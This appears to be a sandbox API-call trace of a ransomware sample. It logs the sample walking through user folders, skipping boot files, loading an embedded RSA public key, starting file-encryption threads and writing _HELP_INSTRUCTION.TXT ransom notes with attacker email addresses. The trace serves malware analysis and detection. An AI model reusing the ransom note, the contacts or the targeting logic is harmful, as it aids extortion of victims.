(lpString1="Administrator.contact", lpString2="..") returned 1 [0135.237] lstrcmpW (lpString1="Administrator.contact", lpString2=".") returned 1 [0135.237] StrStrW (lpFirst="Administrator.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0135.237] StrStrW (lpFirst="Administrator.contact", lpSrch="ntldr") returned 0x0 [0135.237] StrStrW (lpFirst="Administrator.contact", lpSrch="NTLDR") returned 0x0 [0135.237] StrStrW (lpFirst="Administrator.contact", lpSrch="NTDETECT.COM") returned 0x0 [0135.237] StrStrW (lpFirst="Administrator.contact", lpSrch="ntdetect.com") returned 0x0 [0135.237] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="Desktop") returned 0x0 [0135.237] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0135.237] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned 30 [0135.237] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0135.237] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0135.237] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0135.237] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x728 [0135.238] Sleep (dwMilliseconds=0x96) [0135.382] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.382] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0135.382] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0135.382] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0135.382] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0135.382] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0135.382] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0135.382] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0135.382] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="Desktop") returned 0x0 [0135.382] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0135.382] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned 30 [0135.382] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0135.382] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0135.382] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0135.382] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x72c [0135.383] Sleep (dwMilliseconds=0x96) [0135.712] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0135.712] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0135.712] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0135.713] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0135.713] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Contacts\\*.*") returned="C:\\Users\\Default\\Contacts\\*.*" [0135.713] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="Desktop") returned 0x0 [0135.713] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0135.713] SetErrorMode (uMode=0x1) returned 0x1 [0135.713] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT") returned 47 [0135.713] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0135.725] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0135.726] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x730) returned 0x0 [0135.726] RegQueryValueExW (in: hKey=0x730, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d002e0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d002e0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0135.726] RegCloseKey (hKey=0x730) returned 0x0 [0135.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0135.726] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0135.726] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.726] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.726] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0135.726] PathFindFileNameW (pszPath="C:\\Users\\Default\\Contacts") returned="Contacts" [0135.726] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0135.726] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0135.726] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0135.726] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.726] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0135.727] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.727] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.727] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0135.727] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0135.727] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0135.727] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.727] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0135.727] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0135.727] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0135.727] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0135.727] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0135.727] SetErrorMode (uMode=0x1) returned 0x1 [0135.727] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0135.727] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0135.727] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Cookies\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0135.727] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Cookies\\*.*") returned="C:\\Users\\Default\\Cookies\\*.*" [0135.727] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0135.728] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0135.728] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0135.728] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Cookies\\*.*") returned="C:\\Users\\Default\\Cookies\\*.*" [0135.728] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="Desktop") returned 0x0 [0135.728] StrStrW (lpFirst="C:\\Users\\Default\\Cookies\\", lpSrch="DESKTOP") returned 0x0 [0135.728] SetErrorMode (uMode=0x1) returned 0x1 [0135.728] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT") returned 46 [0135.728] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0135.729] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0135.729] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x734) returned 0x0 [0135.729] RegQueryValueExW (in: hKey=0x734, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d00510, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d00510*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0135.729] RegCloseKey (hKey=0x734) returned 0x0 [0135.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0135.729] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0135.729] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.820] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.822] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0135.822] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0135.822] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.823] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0135.823] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0135.823] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0135.823] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0135.823] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0135.823] SetErrorMode (uMode=0x1) returned 0x1 [0135.823] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0135.823] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0135.823] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Desktop\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0135.823] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Desktop\\*.*") returned="C:\\Users\\Default\\Desktop\\*.*" [0135.823] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0135.823] PathFindFileNameW (pszPath="C:\\Users\\Default\\Desktop") returned="Desktop" [0135.823] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0135.823] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.823] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.824] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0135.824] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0135.824] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0135.824] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0135.824] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0135.824] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0135.824] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0135.824] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0135.824] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0135.824] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0135.824] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0135.824] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0135.824] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Desktop\\*.*") returned="C:\\Users\\Default\\Desktop\\*.*" [0135.824] StrStrW (lpFirst="C:\\Users\\Default\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0135.824] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0135.825] PathFindFileNameW (pszPath="C:\\Users\\Default\\Desktop") returned="Desktop" [0135.825] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0135.825] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0135.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0135.825] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0135.825] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.825] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0135.825] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0135.825] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0135.825] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.825] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0135.825] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0135.825] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0135.825] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0135.825] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0135.826] SetErrorMode (uMode=0x1) returned 0x1 [0135.826] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0135.826] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0135.826] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0135.826] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\*.*") returned="C:\\Users\\Default\\Documents\\*.*" [0135.826] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0135.826] PathFindFileNameW (pszPath="C:\\Users\\Default\\Documents") returned="Documents" [0135.827] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0135.827] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.827] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.827] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0135.827] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0135.827] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0135.827] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0135.827] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0135.827] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0135.827] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0135.827] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="Desktop") returned 0x0 [0135.827] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0135.827] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\") returned 31 [0135.827] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0135.827] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0135.827] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\") returned="\\\\?\\C:\\Users\\Default\\Documents\\" [0135.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x740 [0135.866] Sleep (dwMilliseconds=0x96) [0136.040] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.040] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.040] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.040] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0136.040] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0136.041] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0136.041] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0136.041] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\*.*") returned="C:\\Users\\Default\\Documents\\*.*" [0136.041] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="Desktop") returned 0x0 [0136.041] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0136.041] SetErrorMode (uMode=0x1) returned 0x1 [0136.041] wsprintfW (in: param_1=0x17c4dc, 